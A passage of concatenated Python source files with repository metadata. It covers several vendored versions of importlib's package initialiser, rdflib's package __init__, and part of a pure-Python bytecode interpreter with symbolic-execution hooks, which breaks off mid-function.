# importlib._bootstrap is the built-in import, ensure we don't create
# a second copy of the module.
_bootstrap.__name__ = 'importlib._bootstrap'
_bootstrap.__package__ = 'importlib'
_bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
sys.modules['importlib._bootstrap'] = _bootstrap
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
import types
import warnings
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
"""Call the invalidate_caches() method on all meta path finders stored in
sys.meta_path (where implemented)."""
for finder in sys.meta_path:
if hasattr(finder, 'invalidate_caches'):
finder.invalidate_caches()
def find_loader(name, path=None):
"""Return the loader for the specified module.
This is a backward-compatible wrapper around find_spec().
This function is deprecated in favor of importlib.util.find_spec().
"""
warnings.warn('Use importlib.util.find_spec() instead.',
DeprecationWarning, stacklevel=2)
try:
loader = sys.modules[name].__loader__
if loader is None:
raise ValueError('{}.__loader__ is None'.format(name))
else:
return loader
except KeyError:
pass
except AttributeError:
raise ValueError('{}.__loader__ is not set'.format(name))
spec = _bootstrap._find_spec(name, path)
# We won't worry about malformed specs (missing attributes).
if spec is None:
return None
if spec.loader is None:
if spec.submodule_search_locations is None:
raise ImportError('spec for {} missing loader'.format(name),
name=name)
raise ImportError('namespace packages do not have loaders',
name=name)
return spec.loader
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
msg = ("the 'package' argument is required to perform a relative "
"import for {!r}")
raise TypeError(msg.format(name))
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
_RELOADING = {}
def reload(module):
"""Reload the module and return it.
The module must have been successfully imported before.
"""
if not module or not isinstance(module, types.ModuleType):
raise TypeError("reload() argument must be module")
try:
name = module.__spec__.name
except AttributeError:
name = module.__name__
if sys.modules.get(name) is not module:
msg = "module {} not in sys.modules"
raise ImportError(msg.format(name), name=name)
if name in _RELOADING:
return _RELOADING[name]
_RELOADING[name] = module
try:
parent_name = name.rpartition('.')[0]
if parent_name:
try:
parent = sys.modules[parent_name]
except KeyError:
msg = "parent {!r} not in sys.modules"
raise ImportError(msg.format(parent_name), name=parent_name)
else:
pkgpath = parent.__path__
else:
pkgpath = None
target = module
spec = module.__spec__ = _bootstrap._find_spec(name, pkgpath, target)
methods = _bootstrap._SpecMethods(spec)
methods.exec(module)
# The module may have replaced itself in sys.modules!
return sys.modules[name]
finally:
try:
del _RELOADING[name]
except KeyError:
pass
| {
"repo_name": "tpsatish95/Python-Workshop",
"path": "Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/importlib/__init__.py",
"copies": "6",
"size": "4990",
"license": "apache-2.0",
"hash": -8442914687888726000,
"line_mean": 32.0463576159,
"line_max": 78,
"alpha_frac": 0.6158316633,
"autogenerated": false,
"ratio": 4.459338695263628,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0011125463940033478,
"num_lines": 151
} |
"""A pure Python implementation of import.
References on import:
* Language reference
http://docs.python.org/ref/import.html
* __import__ function
http://docs.python.org/lib/built-in-funcs.html
* Packages
http://www.python.org/doc/essays/packages.html
* PEP 235: Import on Case-Insensitive Platforms
http://www.python.org/dev/peps/pep-0235
* PEP 275: Import Modules from Zip Archives
http://www.python.org/dev/peps/pep-0273
* PEP 302: New Import Hooks
http://www.python.org/dev/peps/pep-0302/
* PEP 328: Imports: Multi-line and Absolute/Relative
http://www.python.org/dev/peps/pep-0328
"""
__all__ = ['__import__', 'import_module']
from . import _bootstrap
import os
import re
import tokenize
# Bootstrap help #####################################################
def _case_ok(directory, check):
"""Check if the directory contains something matching 'check'.
No check is done if the file/directory exists or not.
"""
if 'PYTHONCASEOK' in os.environ:
return True
elif check in os.listdir(directory if directory else os.getcwd()):
return True
return False
def _w_long(x):
"""Convert a 32-bit integer to little-endian.
XXX Temporary until marshal's long functions are exposed.
"""
x = int(x)
int_bytes = []
int_bytes.append(x & 0xFF)
int_bytes.append((x >> 8) & 0xFF)
int_bytes.append((x >> 16) & 0xFF)
int_bytes.append((x >> 24) & 0xFF)
return bytearray(int_bytes)
def _r_long(int_bytes):
"""Convert 4 bytes in little-endian to an integer.
XXX Temporary until marshal's long function are exposed.
"""
x = int_bytes[0]
x |= int_bytes[1] << 8
x |= int_bytes[2] << 16
x |= int_bytes[3] << 24
return x
# Required built-in modules.
try:
import posix as _os
except ImportError:
try:
import nt as _os
except ImportError:
try:
import os2 as _os
except ImportError:
raise ImportError('posix, nt, or os2 module required for importlib')
_bootstrap._os = _os
import imp, sys, marshal, errno, _io
_bootstrap.imp = imp
_bootstrap.sys = sys
_bootstrap.marshal = marshal
_bootstrap.errno = errno
_bootstrap._io = _io
import _warnings
_bootstrap._warnings = _warnings
from os import sep
# For os.path.join replacement; pull from Include/osdefs.h:SEP .
_bootstrap.path_sep = sep
_bootstrap._case_ok = _case_ok
marshal._w_long = _w_long
marshal._r_long = _r_long
# Public API #########################################################
from ._bootstrap import __import__
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
raise TypeError("relative imports require the 'package' argument")
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
| {
"repo_name": "RockySteveJobs/python-for-android",
"path": "python3-alpha/python3-src/Lib/importlib/__init__.py",
"copies": "51",
"size": "3236",
"license": "apache-2.0",
"hash": -490999631127492300,
"line_mean": 25.0967741935,
"line_max": 80,
"alpha_frac": 0.6152657602,
"autogenerated": false,
"ratio": 3.784795321637427,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": null,
"num_lines": null
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
try:
import _frozen_importlib as _bootstrap
except ImportError:
from . import _bootstrap
_bootstrap._setup(sys, _imp)
else:
# importlib._bootstrap is the built-in import, ensure we don't create
# a second copy of the module.
_bootstrap.__name__ = 'importlib._bootstrap'
_bootstrap.__package__ = 'importlib'
try:
_bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
except NameError:
# __file__ is not guaranteed to be defined, e.g. if this code gets
# frozen by a tool like cx_Freeze.
pass
sys.modules['importlib._bootstrap'] = _bootstrap
try:
import _frozen_importlib_external as _bootstrap_external
except ImportError:
from . import _bootstrap_external
_bootstrap_external._setup(_bootstrap)
_bootstrap._bootstrap_external = _bootstrap_external
else:
_bootstrap_external.__name__ = 'importlib._bootstrap_external'
_bootstrap_external.__package__ = 'importlib'
try:
_bootstrap_external.__file__ = __file__.replace('__init__.py', '_bootstrap_external.py')
except NameError:
# __file__ is not guaranteed to be defined, e.g. if this code gets
# frozen by a tool like cx_Freeze.
pass
sys.modules['importlib._bootstrap_external'] = _bootstrap_external
# To simplify imports in test code
_w_long = _bootstrap_external._w_long
_r_long = _bootstrap_external._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
import types
import warnings
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
"""Call the invalidate_caches() method on all meta path finders stored in
sys.meta_path (where implemented)."""
for finder in sys.meta_path:
if hasattr(finder, 'invalidate_caches'):
finder.invalidate_caches()
def find_loader(name, path=None):
"""Return the loader for the specified module.
This is a backward-compatible wrapper around find_spec().
This function is deprecated in favor of importlib.util.find_spec().
"""
warnings.warn('Use importlib.util.find_spec() instead.',
DeprecationWarning, stacklevel=2)
try:
loader = sys.modules[name].__loader__
if loader is None:
raise ValueError('{}.__loader__ is None'.format(name))
else:
return loader
except KeyError:
pass
except AttributeError:
raise ValueError('{}.__loader__ is not set'.format(name)) from None
spec = _bootstrap._find_spec(name, path)
# We won't worry about malformed specs (missing attributes).
if spec is None:
return None
if spec.loader is None:
if spec.submodule_search_locations is None:
raise ImportError('spec for {} missing loader'.format(name),
name=name)
raise ImportError('namespace packages do not have loaders',
name=name)
return spec.loader
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
msg = ("the 'package' argument is required to perform a relative "
"import for {!r}")
raise TypeError(msg.format(name))
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
_RELOADING = {}
def reload(module):
"""Reload the module and return it.
The module must have been successfully imported before.
"""
if not module or not isinstance(module, types.ModuleType):
raise TypeError("reload() argument must be module")
try:
name = module.__spec__.name
except AttributeError:
name = module.__name__
if sys.modules.get(name) is not module:
msg = "module {} not in sys.modules"
raise ImportError(msg.format(name), name=name)
if name in _RELOADING:
return _RELOADING[name]
_RELOADING[name] = module
try:
parent_name = name.rpartition('.')[0]
if parent_name:
try:
parent = sys.modules[parent_name]
except KeyError:
msg = "parent {!r} not in sys.modules"
raise ImportError(msg.format(parent_name),
name=parent_name) from None
else:
pkgpath = parent.__path__
else:
pkgpath = None
target = module
spec = module.__spec__ = _bootstrap._find_spec(name, pkgpath, target)
_bootstrap._exec(spec, module)
# The module may have replaced itself in sys.modules!
return sys.modules[name]
finally:
try:
del _RELOADING[name]
except KeyError:
pass
| {
"repo_name": "grupoprog3/proyecto_final",
"path": "proyecto/flask/Lib/importlib/__init__.py",
"copies": "1",
"size": "6041",
"license": "apache-2.0",
"hash": -4303004180038793000,
"line_mean": 32.9190751445,
"line_max": 96,
"alpha_frac": 0.6007283562,
"autogenerated": false,
"ratio": 4.491449814126394,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5592178170326394,
"avg_score": null,
"num_lines": null
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
from . import machinery #fix me brython
try:
import _frozen_importlib as _bootstrap
except ImportError:
from . import _bootstrap
_bootstrap._setup(sys, _imp)
else:
# importlib._bootstrap is the built-in import, ensure we don't create
# a second copy of the module.
_bootstrap.__name__ = 'importlib._bootstrap'
_bootstrap.__package__ = 'importlib'
_bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
sys.modules['importlib._bootstrap'] = _bootstrap
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
"""Call the invalidate_caches() method on all meta path finders stored in
sys.meta_path (where implemented)."""
for finder in sys.meta_path:
if hasattr(finder, 'invalidate_caches'):
finder.invalidate_caches()
def find_loader(name, path=None):
"""Find the loader for the specified module.
First, sys.modules is checked to see if the module was already imported. If
so, then sys.modules[name].__loader__ is returned. If that happens to be
set to None, then ValueError is raised. If the module is not in
sys.modules, then sys.meta_path is searched for a suitable loader with the
value of 'path' given to the finders. None is returned if no loader could
be found.
Dotted names do not have their parent packages implicitly imported. You will
most likely need to explicitly import all parent packages in the proper
order for a submodule to get the correct loader.
"""
try:
loader = sys.modules[name].__loader__
if loader is None:
raise ValueError('{}.__loader__ is None'.format(name))
else:
return loader
except KeyError:
pass
return _bootstrap._find_module(name, path)
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import. It
specifies the package to use as the anchor point from which to resolve the
relative import to an absolute import.
"""
level = 0
if name.startswith('.'):
if not package:
raise TypeError("relative imports require the 'package' argument")
for character in name:
if character != '.':
break
level += 1
return _bootstrap._gcd_import(name[level:], package, level)
#need at least one import hook for importlib stuff to work.
from . import basehook
sys.meta_path.append(basehook.BaseHook())
| {
"repo_name": "nattee/cafe-grader-web",
"path": "lib/assets/Lib/importlib/__init__.py",
"copies": "7",
"size": "3576",
"license": "mit",
"hash": -3941000819250131500,
"line_mean": 34.8659793814,
"line_max": 80,
"alpha_frac": 0.6479306488,
"autogenerated": false,
"ratio": 4.431226765799257,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0012504002368258057,
"num_lines": 97
} |
"""A pure Python package providing the core RDF constructs.
The packages is intended to provide the core RDF types and interfaces
for working with RDF. The package defines a plugin interface for
parsers, stores, and serializers that other packages can use to
implement parsers, stores, and serializers that will plug into the
rdflib package.
The primary interface `rdflib` exposes to work with RDF is
`rdflib.graph.Graph`.
A tiny example:
>>> from rdflib import Graph, URIRef, Literal
>>> g = Graph()
>>> result = g.parse("http://www.w3.org/2000/10/swap/test/meet/blue.rdf")
>>> print("graph has %s statements." % len(g))
graph has 4 statements.
>>>
>>> for s, p, o in g:
... if (s, p, o) not in g:
... raise Exception("It better be!")
>>> s = g.serialize(format='nt')
>>>
>>> sorted(g) == [
... (URIRef(u'http://meetings.example.com/cal#m1'),
... URIRef(u'http://www.example.org/meeting_organization#homePage'),
... URIRef(u'http://meetings.example.com/m1/hp')),
... (URIRef(u'http://www.example.org/people#fred'),
... URIRef(u'http://www.example.org/meeting_organization#attending'),
... URIRef(u'http://meetings.example.com/cal#m1')),
... (URIRef(u'http://www.example.org/people#fred'),
... URIRef(u'http://www.example.org/personal_details#GivenName'),
... Literal(u'Fred')),
... (URIRef(u'http://www.example.org/people#fred'),
... URIRef(u'http://www.example.org/personal_details#hasEmail'),
... URIRef(u'mailto:fred@example.com'))
... ]
True
"""
__docformat__ = "restructuredtext en"
# The format of the __version__ line is matched by a regex in setup.py
__version__ = "4.2.1"
__date__ = "2015/08/12"
__all__ = [
'URIRef',
'BNode',
'Literal',
'Variable',
'Namespace',
'Dataset',
'Graph',
'ConjunctiveGraph',
'RDF',
'RDFS',
'OWL',
'XSD',
'util',
]
import sys
assert sys.version_info >= (2, 5, 0), "rdflib requires Python 2.5 or higher"
del sys
import logging
try:
import __main__
if not hasattr(__main__, '__file__'):
# show log messages in interactive mode
logging.basicConfig(level=logging.INFO)
except ImportError:
#Main already imported from elsewhere
import warnings
warnings.warn('__main__ already imported', ImportWarning)
del warnings
logger = logging.getLogger(__name__)
logger.info("RDFLib Version: %s" % __version__)
try:
unichr(0x10FFFF)
except ValueError:
import warnings
warnings.warn(
'You are using a narrow Python build!\n'
'This means that your Python does not properly support chars > 16bit.\n'
'On your system chars like c=u"\\U0010FFFF" will have a len(c)==2.\n'
'As this can cause hard to debug problems with string processing\n'
'(slicing, regexp, ...) later on, we strongly advise to use a wide\n'
'Python build in production systems.',
ImportWarning)
del warnings
NORMALIZE_LITERALS = True
"""
If True - Literals lexical forms are normalized when created.
I.e. the lexical forms is parsed according to data-type, then the
stored lexical form is the re-serialized value that was parsed.
Illegal values for a datatype are simply kept. The normalized keyword
for Literal.__new__ can override this.
For example:
>>> from rdflib import Literal,XSD
>>> Literal("01", datatype=XSD.int)
rdflib.term.Literal(u'1', datatype=rdflib.term.URIRef(u'http://www.w3.org/2001/XMLSchema#integer'))
This flag may be changed at any time, but will only affect literals
created after that time, previously created literals will remain
(un)normalized.
"""
DAWG_LITERAL_COLLATION = False
"""
DAWG_LITERAL_COLLATION determines how literals are ordered or compared
to each other.
In SPARQL, applying the >,<,>=,<= operators to literals of
incompatible data-types is an error, i.e:
Literal(2)>Literal('cake') is neither true nor false, but an error.
This is a problem in PY3, where lists of Literals of incompatible
types can no longer be sorted.
Setting this flag to True gives you strict DAWG/SPARQL compliance,
setting it to False will order Literals with incompatible datatypes by
datatype URI
In particular, this determines how the rich comparison operators for
Literal work, eq, __neq__, __lt__, etc.
"""
from rdflib.term import (
URIRef, BNode, Literal, Variable)
from rdflib.namespace import Namespace
from rdflib.graph import Dataset, Graph, ConjunctiveGraph
from rdflib.namespace import RDF, RDFS, OWL, XSD
from rdflib import plugin
from rdflib import query
# tedious sop to flake8
assert plugin
assert query
from rdflib import util
| {
"repo_name": "unor/schemaorg",
"path": "lib/rdflib/__init__.py",
"copies": "6",
"size": "4692",
"license": "apache-2.0",
"hash": 6132113990458167000,
"line_mean": 27.6097560976,
"line_max": 99,
"alpha_frac": 0.6768968457,
"autogenerated": false,
"ratio": 3.4474650991917706,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.003260379154237539,
"num_lines": 164
} |
"""A pure-Python Python bytecode interpreter."""
# Based on:
# pyvm2 by Paul Swartz (z3p), from http://www.twistedmatrix.com/users/z3p/
from __future__ import print_function, division
import dis
import inspect
import linecache
import logging
import operator
import sys
import six
from six.moves import reprlib
PY3, PY2 = six.PY3, not six.PY3
from .pyobj import Cell, Frame, Block, Method, Function, Generator
log = logging.getLogger(__name__)
if six.PY3:
byteint = lambda b: b
else:
byteint = ord
# Create a repr that won't overflow.
repr_obj = reprlib.Repr()
repr_obj.maxother = 120
repper = repr_obj.repr
import inspect
import symex
class VirtualMachineError(Exception):
"""For raising errors in the operation of the VM."""
pass
class VirtualMachine(object):
def __init__(self, symbolic_on=False):
# The call stack of frames.
self.frames = []
# The current frame.
self.frame = None
self.return_value = None
self.last_exception = None
self.symbolic_on = symbolic_on
self.interesting_paths = {} # code obj -> list(path)
self._cur_interesting_path = []
self._co_to_decls = {}
self._co_to_envs = {}
def get_decl(self, code_obj):
return self._co_to_decls[code_obj]
def get_env(self, code_obj):
return self._co_to_envs[code_obj].copy()
def set_co_to_decls(self, co_to_decls):
self._co_to_decls.update(co_to_decls)
def set_co_to_envs(self, co_to_envs):
self._co_to_envs.update(co_to_envs)
@property
def cur_interesting_path(self):
return self._cur_interesting_path[-1]
def top(self):
"""Return the value at the top of the stack, with no changes."""
return self.frame.stack[-1]
def pop(self, i=0):
"""Pop a value from the stack.
Default to the top of the stack, but `i` can be a count from the top
instead.
"""
return self.frame.stack.pop(-1-i)
def push(self, *vals):
"""Push values onto the value stack."""
self.frame.stack.extend(vals)
def popn(self, n):
"""Pop a number of values from the value stack.
A list of `n` values is returned, the deepest value first.
"""
if n:
ret = self.frame.stack[-n:]
self.frame.stack[-n:] = []
return ret
else:
return []
def peek(self, n):
"""Get a value `n` entries down in the stack, without changing the stack."""
return self.frame.stack[-n]
def jump(self, jump):
"""Move the bytecode pointer to `jump`, so it will execute next."""
self.frame.f_lasti = jump
def push_block(self, type, handler=None, level=None):
if level is None:
level = len(self.frame.stack)
self.frame.block_stack.append(Block(type, handler, level))
def pop_block(self):
return self.frame.block_stack.pop()
def make_frame(self, code, callargs={}, f_globals=None, f_locals=None):
log.info("make_frame: code=%r, callargs=%s" % (code, repper(callargs)))
if f_globals is not None:
f_globals = f_globals
if f_locals is None:
f_locals = f_globals
elif self.frames:
f_globals = self.frame.f_globals
f_locals = {}
else:
f_globals = f_locals = {
'__builtins__': __builtins__,
'__name__': '__main__',
'__doc__': None,
'__package__': None,
}
f_locals.update(callargs)
frame = Frame(code, f_globals, f_locals, self.frame)
return frame
def push_frame(self, frame):
self.frames.append(frame)
self.frame = frame
def pop_frame(self):
self.frames.pop()
if self.frames:
self.frame = self.frames[-1]
else:
self.frame = None
def print_frames(self):
"""Print the call stack, for debugging."""
for f in self.frames:
filename = f.f_code.co_filename
lineno = f.line_number()
print(' File "%s", line %d, in %s' % (
filename, lineno, f.f_code.co_name
))
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
if line:
print(' ' + line.strip())
def resume_frame(self, frame):
frame.f_back = self.frame
val = self.run_frame(frame)
frame.f_back = None
return val
def add_interesting_path(self, code, path):
if code not in self.interesting_paths:
self.interesting_paths[code] = []
self.interesting_paths[code].append(path)
def fork(self, code, f_globals=None, f_locals=None):
newVM = VirtualMachine(self.symbolic_on)
newVM.interesting_paths = self.interesting_paths.copy()
newVM._co_to_decls = self._co_to_decls.copy()
newVM._co_to_envs = self._co_to_envs.copy()
newVM.frame = self.frame
val = newVM.run_code(code, f_globals=f_globals)
return val
def run_code(self, code, f_globals=None, f_locals=None):
frame = self.make_frame(code, f_globals=f_globals, f_locals=f_locals)
if self.symbolic_on:
paths = self.interesting_paths.get(code, [])
path = paths.pop(0) if paths else None
val = None
if path:
self._cur_interesting_path.append(path[1:]) # skip entry block
val = self.run_frame(frame)
# Check some invariants
if self.frames: # pragma: no cover
raise VirtualMachineError("Frames left over!")
if self.frame and self.frame.stack: # pragma: no cover
raise VirtualMachineError("Data left on stack! %r" % self.frame.stack)
return val
else:
val = self.run_frame(frame)
# Check some invariants
if self.frames: # pragma: no cover
raise VirtualMachineError("Frames left over!")
if self.frame and self.frame.stack: # pragma: no cover
raise VirtualMachineError("Data left on stack! %r" % self.frame.stack)
return val
def unwind_block(self, block):
if block.type == 'except-handler':
offset = 3
else:
offset = 0
while len(self.frame.stack) > block.level + offset:
self.pop()
if block.type == 'except-handler':
tb, value, exctype = self.popn(3)
self.last_exception = exctype, value, tb
def parse_byte_and_args(self):
""" Parse 1 - 3 bytes of bytecode into
an instruction and optionally arguments."""
f = self.frame
opoffset = f.f_lasti
byteCode = byteint(f.f_code.co_code[opoffset])
f.f_lasti += 1
byteName = dis.opname[byteCode]
arg = None
arguments = []
if byteCode >= dis.HAVE_ARGUMENT:
arg = f.f_code.co_code[f.f_lasti:f.f_lasti+2]
f.f_lasti += 2
intArg = byteint(arg[0]) + (byteint(arg[1]) << 8)
if byteCode in dis.hasconst:
arg = f.f_code.co_consts[intArg]
elif byteCode in dis.hasfree:
if intArg < len(f.f_code.co_cellvars):
arg = f.f_code.co_cellvars[intArg]
else:
var_idx = intArg - len(f.f_code.co_cellvars)
arg = f.f_code.co_freevars[var_idx]
elif byteCode in dis.hasname:
arg = f.f_code.co_names[intArg]
elif byteCode in dis.hasjrel:
arg = f.f_lasti + intArg
elif byteCode in dis.hasjabs:
arg = intArg
elif byteCode in dis.haslocal:
arg = f.f_code.co_varnames[intArg]
else:
arg = intArg
arguments = [arg]
return byteName, arguments, opoffset
def log(self, byteName, arguments, opoffset):
""" Log arguments, block stack, and data stack for each opcode."""
op = "%d: %s" % (opoffset, byteName)
if arguments:
op += " %r" % (arguments[0],)
indent = " "*(len(self.frames)-1)
stack_rep = repper(self.frame.stack)
block_stack_rep = repper(self.frame.block_stack)
log.info(" %sdata: %s" % (indent, stack_rep))
log.info(" %sblks: %s" % (indent, block_stack_rep))
log.info("%s%s" % (indent, op))
def dispatch(self, byteName, arguments):
""" Dispatch by bytename to the corresponding methods.
Exceptions are caught and set on the virtual machine."""
print('%s %s' % (byteName, arguments))
why = None
try:
if byteName.startswith('UNARY_'):
self.unaryOperator(byteName[6:])
elif byteName.startswith('BINARY_'):
self.binaryOperator(byteName[7:])
elif byteName.startswith('INPLACE_'):
self.inplaceOperator(byteName[8:])
elif 'SLICE+' in byteName:
self.sliceOperator(byteName)
else:
# dispatch
bytecode_fn = getattr(self, 'byte_%s' % byteName, None)
if not bytecode_fn: # pragma: no cover
raise VirtualMachineError(
"unknown bytecode type: %s" % byteName
)
why = bytecode_fn(*arguments)
except:
# deal with exceptions encountered while executing the op.
self.last_exception = sys.exc_info()[:2] + (None,)
log.exception("Caught exception during execution")
why = 'exception'
return why
def manage_block_stack(self, why):
""" Manage a frame's block stack.
Manipulate the block stack and data stack for looping,
exception handling, or returning."""
assert why != 'yield'
block = self.frame.block_stack[-1]
if block.type == 'loop' and why == 'continue':
self.jump(self.return_value)
why = None
return why
self.pop_block()
self.unwind_block(block)
if block.type == 'loop' and why == 'break':
why = None
self.jump(block.handler)
return why
if PY2:
if (
block.type == 'finally' or
(block.type == 'setup-except' and why == 'exception') or
block.type == 'with'
):
if why == 'exception':
exctype, value, tb = self.last_exception
self.push(tb, value, exctype)
else:
if why in ('return', 'continue'):
self.push(self.return_value)
self.push(why)
why = None
self.jump(block.handler)
return why
elif PY3:
if (
why == 'exception' and
block.type in ['setup-except', 'finally']
):
self.push_block('except-handler')
exctype, value, tb = self.last_exception
self.push(tb, value, exctype)
# PyErr_Normalize_Exception goes here
self.push(tb, value, exctype)
why = None
self.jump(block.handler)
return why
elif block.type == 'finally':
if why in ('return', 'continue'):
self.push(self.return_value)
self.push(why)
why = None
self.jump(block.handler)
return why
return why
def run_frame(self, frame):
"""Run a frame until it returns (somehow).
Exceptions are raised, the return value is returned.
"""
self.push_frame(frame)
while True:
byteName, arguments, opoffset = self.parse_byte_and_args()
if log.isEnabledFor(logging.INFO):
self.log(byteName, arguments, opoffset)
# When unwinding the block stack, we need to keep track of why we
# are doing it.
why = self.dispatch(byteName, arguments)
if why == 'exception':
# TODO: ceval calls PyTraceBack_Here, not sure what that does.
pass
if why == 'reraise':
why = 'exception'
if why != 'yield':
while why and frame.block_stack:
# Deal with any block management we need to do.
why = self.manage_block_stack(why)
if why:
break
# TODO: handle generator exception state
self.pop_frame()
if why == 'exception':
six.reraise(*self.last_exception)
return self.return_value
## Stack manipulation
def byte_LOAD_CONST(self, const):
self.push(const)
def byte_POP_TOP(self):
self.pop()
def byte_DUP_TOP(self):
self.push(self.top())
def byte_DUP_TOPX(self, count):
items = self.popn(count)
for i in [1, 2]:
self.push(*items)
def byte_DUP_TOP_TWO(self):
# Py3 only
a, b = self.popn(2)
self.push(a, b, a, b)
def byte_ROT_TWO(self):
a, b = self.popn(2)
self.push(b, a)
def byte_ROT_THREE(self):
a, b, c = self.popn(3)
self.push(c, a, b)
def byte_ROT_FOUR(self):
a, b, c, d = self.popn(4)
self.push(d, a, b, c)
## Names
def byte_LOAD_NAME(self, name):
frame = self.frame
if name in frame.f_locals:
val = frame.f_locals[name]
elif name in frame.f_globals:
val = frame.f_globals[name]
elif name in frame.f_builtins:
val = frame.f_builtins[name]
else:
raise NameError("name '%s' is not defined" % name)
self.push(val)
def byte_STORE_NAME(self, name):
self.frame.f_locals[name] = self.pop()
def byte_DELETE_NAME(self, name):
del self.frame.f_locals[name]
def byte_LOAD_FAST(self, name):
if name in self.frame.f_locals:
val = self.frame.f_locals[name]
else:
raise UnboundLocalError(
"local variable '%s' referenced before assignment" % name
)
self.push(val)
def byte_STORE_FAST(self, name):
self.frame.f_locals[name] = self.pop()
def byte_DELETE_FAST(self, name):
del self.frame.f_locals[name]
def byte_LOAD_GLOBAL(self, name):
f = self.frame
if name in f.f_globals:
val = f.f_globals[name]
elif name in f.f_builtins:
val = f.f_builtins[name]
else:
raise NameError("global name '%s' is not defined" % name)
self.push(val)
def byte_LOAD_DEREF(self, name):
self.push(self.frame.cells[name].get())
def byte_STORE_DEREF(self, name):
self.frame.cells[name].set(self.pop())
def byte_LOAD_LOCALS(self):
self.push(self.frame.f_locals)
## Operators
UNARY_OPERATORS = {
'POSITIVE': operator.pos,
'NEGATIVE': operator.neg,
'NOT': operator.not_,
'CONVERT': repr,
'INVERT': operator.invert,
}
def unaryOperator(self, op):
x = self.pop()
self.push(self.UNARY_OPERATORS[op](x))
BINARY_OPERATORS = {
'POWER': pow,
'MULTIPLY': operator.mul,
'DIVIDE': getattr(operator, 'div', lambda x, y: None),
'FLOOR_DIVIDE': operator.floordiv,
'TRUE_DIVIDE': operator.truediv,
'MODULO': operator.mod,
'ADD': operator.add,
'SUBTRACT': operator.sub,
'SUBSCR': operator.getitem,
'LSHIFT': operator.lshift,
'RSHIFT': operator.rshift,
'AND': operator.and_,
'XOR': operator.xor,
'OR': operator.or_,
}
def binaryOperator(self, op):
x, y = self.popn(2)
self.push(self.BINARY_OPERATORS[op](x, y))
def inplaceOperator(self, op):
x, y = self.popn(2)
if op == 'POWER':
x **= y
elif op == 'MULTIPLY':
x *= y
elif op in ['DIVIDE', 'FLOOR_DIVIDE']:
x //= y
elif op == 'TRUE_DIVIDE':
x /= y
elif op == 'MODULO':
x %= y
elif op == 'ADD':
x += y
elif op == 'SUBTRACT':
x -= y
elif op == 'LSHIFT':
x <<= y
elif op == 'RSHIFT':
x >>= y
elif op == 'AND':
x &= y
elif op == 'XOR':
x ^= y
elif op == 'OR':
x |= y
else: # pragma: no cover
raise VirtualMachineError("Unknown in-place operator: %r" % op)
self.push(x)
def sliceOperator(self, op):
start = 0
end = None # we will take this to mean end
op, count = op[:-2], int(op[-1])
if count == 1:
start = self.pop()
elif count == 2:
end = self.pop()
elif count == 3:
end = self.pop()
start = self.pop()
l = self.pop()
if end is None:
end = len(l)
if op.startswith('STORE_'):
l[start:end] = self.pop()
elif op.startswith('DELETE_'):
del l[start:end]
else:
self.push(l[start:end])
COMPARE_OPERATORS = [
operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.gt,
operator.ge,
#lambda x, y: x in y,
symex.symbolic_in,
lambda x, y: x not in y,
#lambda x, y: x is y,
symex.symbolic_is,
lambda x, y: x is not y,
lambda x, y: issubclass(x, Exception) and issubclass(x, y),
]
def byte_COMPARE_OP(self, opnum):
x, y = self.popn(2)
self.push(self.COMPARE_OPERATORS[opnum](x, y))
## Attributes and indexing
def byte_LOAD_ATTR(self, attr):
obj = self.pop()
val = getattr(obj, attr)
self.push(val)
def byte_STORE_ATTR(self, name):
val, obj = self.popn(2)
setattr(obj, name, val)
def byte_DELETE_ATTR(self, name):
obj = self.pop()
